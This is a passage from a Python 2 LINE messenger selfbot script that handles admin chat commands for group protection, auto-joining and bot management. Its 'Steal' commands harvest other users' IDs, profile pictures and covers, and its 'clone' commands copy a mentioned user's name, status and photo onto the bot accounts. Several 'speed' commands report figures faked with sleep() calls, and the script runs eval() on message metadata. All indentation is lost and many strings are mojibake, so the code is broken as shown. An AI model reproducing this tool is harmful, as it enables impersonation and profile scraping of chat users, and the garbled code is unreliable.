wait['pname'][msg.to] = True
wait['pro_name'][msg.to] = cl.getGroup(msg.to).name
elif "Namelock:off" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝ ƠƑƑ.")
del wait['pname'][msg.to]
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƑƑ")
elif "Blockinvite:on" == msg.text:
if msg.from_ in admin:
gid = msg.to
autocancel[gid] = "poni"
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƝ")
elif "Blockinvite:off" == msg.text:
if msg.from_ in admin:
try:
del autocancel[msg.to]
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƑƑ")
except:
pass
#================================================================
elif msg.text in ["Undang"]:
if msg.from_ in admin:
wait["winvite"] = True
cl.sendText(msg.to,"send contact")
#============================================================
elif "Steal mid" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
cl.sendText(msg.to,"Mc: " + key1)
elif "Steal contact" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mmid = cl.getContact(key1)
msg.contentType = 13
msg.contentMetadata = {"mid": key1}
cl.sendMessage(msg)#=================
elif msg.text in ["Mc "]:
if msg.from_ in admin:
mmid = msg.text.replace("Mc ","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
elif msg.text in ["Joinn on","joinn on"]:
if msg.from_ in admin:
if wait["Protectjoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group On")
else:
cl.sendText(msg.to,"Done")
else:
wait["Protectjoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Kick Joined Group On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Joinn off","joinn off"]:
if msg.from_ in admin:
if wait["Protectjoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectjoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"kick Joined Group Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Cancel on","cancel on"]:
if msg.from_ in admin:
if wait["Protectcancl"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Cancel off","cancel off"]:
if msg.from_ in admin:
if wait["Protectcancl"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancl"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cancel Semua Undangan Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Qr on","qr on"]:
if msg.from_ in admin:
if wait["Protectgr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Qr off","qr off"]:
if msg.from_ in admin:
if wait["Protectgr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect QR Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Contact On","Contact on","contact on"]:
if msg.from_ in admin:
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak On")
else:
cl.sendText(msg.to,"done")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Contact Off","Contact off","contact off"]:
if msg.from_ in admin:
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak Off")
else:
cl.sendText(msg.to,"done")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Cek Mid Lewat Share Kontak Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["自動å�‚åŠ :オン","Join on","Auto join on","自動å�ƒåŠ ï¼šé–‹"]:
if msg.from_ in admin:
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["自動å�‚åŠ :オフ","Join off","Auto join off","自動å�ƒåŠ ï¼šé—œ"]:
if msg.from_ in admin:
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Gcancel:"]:
try:
strnum = msg.text.replace("Gcancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation refused turned off\nTo turn on please specify the number of people and send")
else:
cl.sendText(msg.to,"关了邀请拒�。�时开请指定人数��")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + "The group of people and below decided to automatically refuse invitation")
else:
cl.sendText(msg.to,strnum + "使人以下的å°�组ç���¨è‡ªåŠ¨é‚€è¯·æ���’ç»�")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Value is wrong")
else:
cl.sendText(msg.to,"Bizarre ratings")
elif msg.text in ["強制自動退出:オン","Leave on","Auto leave:on","強制自動退出:開"]:
if msg.from_ in admin:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["強制自動退出:オフ","Leave off","Auto leave:off","強制自��‹•退出ï¼��é—œ"]:
if msg.from_ in admin:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already")
elif msg.text in ["共有:オン","Share on","Share on"]:
if msg.from_ in admin:
if wait["timeline"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["å���±æœ‰:オフ","Share off","Share off"]:
if msg.from_ in admin:
if wait["timeline"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦�了关æ–。")
elif msg.text in ["Status","Set"]:
if msg.from_ in admin:
md = "⭐Status Protection*============*\n"
if wait["Protectgr"] == True: md+="[•]Protect QR [On]\n"
else: md+="[•]Protect QR [Off]\n"
if wait["Protectcancl"] == True: md+="[•]Protect Invite [On]\n"
else: md+="[•]Protect Invite [Off]\n"
if wait["contact"] == True: md+="[•]Contact [On]\n"
else: md+="[•]Contact [Off]\n"
if wait["autoJoin"] == True: md+="[•]Auto Join [On]\n"
else: md +="[•]Auto Join [Off]\n"
if wait["autoCancel"]["on"] == True:md+="[•]Group Cancel " + str(wait["autoCancel"]["members"]) + "\n"
else: md+= "[•]Group Cancel [Off]\n"
if wait["leaveRoom"] == True: md+="[•]Auto Leave [On]\n"
else: md+="[•]Auto Leave [Off]\n"
if wait["timeline"] == True: md+="[•]Share [On]\n"
else:md+="[•]Share [Off]\n"
if wait["autoAdd"] == True: md+="[•]Auto Add [On]\n"
else:md+="[•]Auto Add [Off]\n"
if wait["Backup"] == True: md+="[•]Backup : on\n"
else:md+="[•]Backup : off\n"
if wait["qr"] == True: md+="[•]AutoBlock QR : on\n"
else:md+="[•]AutoBlock QR : off\n"
if wait["commentOn"] == True: md+="[•]Comment [On]\n"
else:md+="[•]Comment [Off]\n"
if wait["protectionOn"] == True: md+="[•]Protection : hight\n"+ datetime.today().strftime('%H:%M:%S')
else:md+="[•]Protection : low\n"+ datetime.today().strftime('%H:%M:%S')
"\n*============*\n⭐✰ (☆─┅═ই╬BABANG ADHI)=======*"
cl.sendText(msg.to,md)
elif "Time" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to,datetime.today().strftime('%H:%M:%S'))
elif "album merit " in msg.text:
gid = msg.text.replace("album merit ","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"There is no album")
else:
cl.sendText(msg.to,"相册没在。")
else:
if wait["lang"] == "JP":
mg = "The following is the target album"
else:
mg = "以下是对象的ç���¸å†Œ"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n"
else:
mg += str(y["title"]) + ":0sheet\n"
cl.sendText(msg.to,mg)
elif "album " in msg.text:
gid = msg.text.replace("album ","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"There is no album")
else:
cl.sendText(msg.to,"相册没在。")
else:
if wait["lang"] == "JP":
mg = "The following is the target album"
else:
mg = "以下是对象的相册"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n"
else:
mg += str(y["title"]) + ":0sheet\n"
elif "album remove " in msg.text:
gid = msg.text.replace("album remove ","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["id"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Deleted albums")
else:
cl.sendText(msg.to,str(i) + "åˆ é™¤äº†äº‹çš„ç›¸å†Œã€‚")
elif msg.text in ["Group id"]:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:\n%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
elif msg.text in ["Cancelall"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All invitations have been refused")
else:
cl.sendText(msg.to,"拒�了全部的邀请。")
elif "album removeat’" in msg.text:
gid = msg.text.replace("album removeat’","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["id"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Albums deleted")
else:
cl.sendText(msg.to,str(i) + "åˆ é™¤äº†äº‹çš„ç›¸å†Œã€‚")
elif msg.text in ["è‡ªå‹•è¿½åŠ :オン","Add on","Auto add:on","è‡ªå‹•è¿½åŠ ï¼šé–‹"]:
if msg.from_ in admin:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"Done")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["è‡ªå‹•è¿½åŠ :オフ","Add off","Auto add:off","è‡ªå‹•è¿½åŠ ï¼šé—œ"]:
if msg.from_ in admin:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦�了关æ–。")
elif "Message change: " in msg.text:
wait["message"] = msg.text.replace("Message change: ","")
cl.sendText(msg.to,"message changed")
elif "Message add: " in msg.text:
wait["message"] = msg.text.replace("Message add: ","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"message changed")
else:
cl.sendText(msg.to,"done。")
elif msg.text in ["Message","è‡ªå‹•è¿½åŠ å•�候語確èª�"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,"message change to\n\n" + wait["message"])
else:
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["message"])
elif "Comment:" in msg.text:
c = msg.text.replace("Comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"message changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif "Add comment:" in msg.text:
c = msg.text.replace("Add comment:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
#-----------------------------------------------
elif msg.text in ["Backup:on"]:
if msg.from_ in admin:
if wait["Backup"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been active\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been enable\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been active\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been enable\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Backup:off"]:
if msg.from_ in admin:
if wait["Backup"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been unactive\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been desable\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"backup has been unactive\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"backup has been desable\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Rejectall"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Invites has been Rejected")
else:
cl.sendText(msg.to,"拒绝了全部的邀请。")
#---------------------Sc invite owner ke group------
elif "Anu: " in msg.text:
if msg.from_ in owner:
gid = msg.text.replace("Anu: ","")
if gid == "":
cl.sendText(msg.to,"Invalid group id")
else:
try:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(gid,[msg.from_])
except:
cl.sendText(msg.to,"Mungkin saya tidak di dalaam grup itu")
#--------===---====--------------
elif msg.text in ["コメント:オン","Comment on","Comment:on","自動首é �留言:開"]:
if msg.from_ in admin:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already on")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"�了开。")
elif msg.text in ["コメント:オフ","Comment off","comment off","自動首é �留言:關"]:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦�了关æ–。")
elif msg.text in ["Comment","留言確�"]:
cl.sendText(msg.to,"message changed to\n\n" + str(wait["comment"]))
elif msg.text in ["Gurl"]:
if msg.from_ in admin:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
cl.updateGroup(x)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Cv1 gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
ki.updateGroup(x)
gurl = ki.reissueGroupTicket(msg.to)
ki.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Cv2 gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
kk.updateGroup(x)
gurl = kk.reissueGroupTicket(msg.to)
kk.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Cv3 gurl"]:
if msg.toType == 2:
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
kc.updateGroup(x)
gurl = kc.reissueGroupTicket(msg.to)
kc.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Can't be used outside the group")
else:
cl.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Comment bl "]:
wait["wblack"] = True
cl.sendText(msg.to,"add to comment bl")
elif msg.text in ["Comment wl "]:
wait["dblack"] = True
cl.sendText(msg.to,"wl to comment bl")
elif msg.text in ["Comment bl confirm"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"confirmed")
else:
cl.sendText(msg.to,"Blacklist")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
#-------------Fungsi Jam on/off Start-------------------#
elif msg.text in ["Jam on"]:
if msg.from_ in admin:
if wait["clock"] == True:
kc.sendText(msg.to,"Bot 4 jam on")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = kc.getProfile()
profile.displayName = wait["cName4"] + nowT
kc.updateProfile(profile)
kc.sendText(msg.to,"Jam Selalu On")
elif msg.text in ["Jam off"]:
if msg.from_ in admin:
if wait["clock"] == False:
kc.sendText(msg.to,"Bot 4 jam off")
else:
wait["clock"] = False
kc.sendText(msg.to,"Jam Sedang Off")
#-------------Fungsi Jam on/off Finish-------------------#
#-------------Fungsi Change Clock Start------------------#
elif msg.text in ["Change clock"]:
n = msg.text.replace("Change clock","")
if len(n.decode("utf-8")) > 13:
cl.sendText(msg.to,"changed")
else:
wait["cName"] = n
cl.sendText(msg.to,"changed to\n\n" + n)
#-------------Fungsi Change Clock Finish-----------------#
#-------------Fungsi Jam Update Start---------------------#
elif msg.text in ["Jam Update"]:
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"(%H:%M)")
profile = kc.getProfile()
profile.displayName = wait["cName4"] + nowT
kc.updateProfile(profile)
kc.sendText(msg.to,"Sukses update")
else:
kc.sendText(msg.to,"Aktifkan jam terlebih dulu")
#-------------Fungsi Jam Update Finish-------------------#
#========================================
elif "Steal cover @" in msg.text:
if msg.from_ in admin:
print "[Command]dp executing"
_name = msg.text.replace("Steal cover @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
elif "Midpict:" in msg.text:
if msg.from_ in admin:
umid = msg.text.replace("Midpict:","")
contact = cl.getContact(umid)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
elif "Steal pict " in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
msg.contentType = 0
steal0 = msg.text.replace("Steal pict ","")
steal1 = steal0.lstrip()
steal2 = steal1.replace("@","")
steal3 = steal2.rstrip()
_name = steal3
group = cl.getGroup(msg.to)
targets = []
for g in group.members:
if _name == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
try:
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
except:
image = "https://www.1and1.co.uk/digitalguide/fileadmin/DigitalGuide/Teaser/not-found-t.jpg"
try:
cl.sendImageWithURL(msg.to,image)
except Exception as error:
cl.sendText(msg.to,(error))
pass
except:
cl.sendText(msg.to,"Error!")
break
else:
cl.sendText(msg.to,"Tidak bisa dilakukan di luar grup")
#===============================================
#===============================================
elif msg.text in ["debug speed","Debug speed"]:
if msg.from_ in admin:
cl.sendText(msg.to, "Measuring...")
start = time.time()
time.sleep(0.0001)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif msg.text in ["zzz","Bot speed"]:
if msg.from_ in admin:
cl.sendText(msg.to, "Measuring...")
start = time.time()
time.sleep(0.00009)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Speed respon" in msg.text:
if msg.from_ in admin:
print("Speed respon")
cl.sendText(msg.to, "Measuring...")
start = time.time()
time.sleep(0.0001)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "kurangin" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to, "Sek lurr")
start = time.time()
time.sleep(0.02)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Rusakin" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to, "Sek lurr")
start = time.time()
time.sleep(0.1)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Tambah" in msg.text:
if msg.from_ in admin:
cl.sendText(msg.to, "Sek lurr")
start = time.time()
time.sleep(0.5)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif "Spbot" in msg.text:
if msg.from_ in admin:
time.sleep(0.5)
cl.sendText(msg.to, "Sek lurr")
start = time.time()
time.sleep(2.32)
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed palsu executed"
elif msg.text in ["Sp asli"]:
if msg.from_ in admin:
print("Sp asli")
start = time.time()
cl.sendText(msg.to, "Sek")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
print "[Command]Speed asli executed"
elif msg.text in ["Speedbot","speedbot"]:
if msg.from_ in admin:
print("Speedbot")
start = time.time()
cl.sendText(msg.to, "loading...................")
elapsed_time = time.time() - start
cl.sendText(msg.to, "%sseconds" % (elapsed_time))
ki.sendText(msg.to, "%sseconds" % (elapsed_time))
kk.sendText(msg.to, "%sseconds" % (elapsed_time))
kc.sendText(msg.to, "%sseconds" % (elapsed_time))
ks.sendText(msg.to, "%sseconds" % (elapsed_time))
k1.sendText(msg.to, "%sseconds" % (elapsed_time))
#========================================
elif msg.text in ["Bot1 backup run"]:
if msg.from_ in admin:
wek = cl.getContact(mid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mydn.txt',"w")
s.write(r)
s.close()
t = open('mysm.txt',"w")
t.write(i)
t.close()
u = open('myps.txt',"w")
u.write(a)
u.close()
cl.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot2 backup run"]:
if msg.from_ in admin:
wek = ki.getContact(Amid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mgydn.txt',"w")
s.write(r)
s.close()
t = open('myesm.txt',"w")
t.write(i)
t.close()
u = open('mypfs.txt',"w")
u.write(a)
u.close()
ki.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot3 backup run"]:
if msg.from_ in admin:
wek = kk.getContact(Bmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('msgydn.txt',"w")
s.write(r)
s.close()
t = open('mysfdgm.txt',"w")
t.write(i)
t.close()
u = open('gymyps.txt',"w")
u.write(a)
u.close()
kk.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot4 backup run"]:
if msg.from_ in admin:
wek = kc.getContact(Cmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('jhmydn.txt',"w")
s.write(r)
s.close()
t = open('myhfsm.txt',"w")
t.write(i)
t.close()
u = open('mypfhs.txt',"w")
u.write(a)
u.close()
kc.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot5 backup run"]:
if msg.from_ in admin:
wek = ks.getContact(Dmid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('madydn.txt',"w")
s.write(r)
s.close()
t = open('mysgjm.txt',"w")
t.write(i)
t.close()
u = open('myrdps.txt',"w")
u.write(a)
u.close()
ks.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
elif msg.text in ["Bot6 backup run"]:
if msg.from_ in admin:
wek = k1.getContact(Emid)
a = wek.pictureStatus
r = wek.displayName
i = wek.statusMessage
s = open('mydnsgv.txt',"w")
s.write(r)
s.close()
t = open('jhmysm.txt',"w")
t.write(i)
t.close()
u = open('myiyps.txt',"w")
u.write(a)
u.close()
k1.sendText(msg.to, "backup has been active")
print wek
print a
print r
print i
#----------------------------------------------
elif "Bot1 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = cl.getContact(target)
X = contact.displayName
profile = cl.getProfile()
profile.displayName = X
cl.updateProfile(profile)
cl.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = cl.getProfile()
lol.statusMessage = Y
cl.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
cl.updateProfilePicture(P)
except Exception as e:
cl.sendText(msg.to, "Failed!")
print e
elif "Bot2 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = ki.getContact(target)
X = contact.displayName
profile = ki.getProfile()
profile.displayName = X
ki.updateProfile(profile)
ki.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = ki.getProfile()
lol.statusMessage = Y
ki.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
ki.updateProfilePicture(P)
except Exception as e:
ki.sendText(msg.to, "Failed!")
print e
elif "Bot3 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kk.getContact(target)
X = contact.displayName
profile = kk.getProfile()
profile.displayName = X
kk.updateProfile(profile)
kk.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kk.getProfile()
lol.statusMessage = Y
kk.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kk.updateProfilePicture(P)
except Exception as e:
kk.sendText(msg.to, "Failed!")
print e
elif "Bot4 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = kc.getContact(target)
X = contact.displayName
profile = kc.getProfile()
profile.displayName = X
kc.updateProfile(profile)
kc.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = kc.getProfile()
lol.statusMessage = Y
kc.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
kc.updateProfilePicture(P)
except Exception as e:
kc.sendText(msg.to, "Failed!")
print e
elif "Bot5 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = ks.getContact(target)
X = contact.displayName
profile = ks.getProfile()
profile.displayName = X
ks.updateProfile(profile)
ks.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = ks.getProfile()
lol.statusMessage = Y
ks.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
ks.updateProfilePicture(P)
except Exception as e:
ks.sendText(msg.to, "Failed!")
print e
elif "Bot6 clone " in msg.text:
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
contact = k1.getContact(target)
X = contact.displayName
profile = k1.getProfile()
profile.displayName = X
k1.updateProfile(profile)
k1.sendText(msg.to, "Success...")
#---------------------------------------
Y = contact.statusMessage
lol = k1.getProfile()
lol.statusMessage = Y
k1.updateProfile(lol)
#---------------------------------------
P = contact.pictureStatus
k1.updateProfilePicture(P)
except Exception as e:
k1.sendText(msg.to, "Failed!")
print e
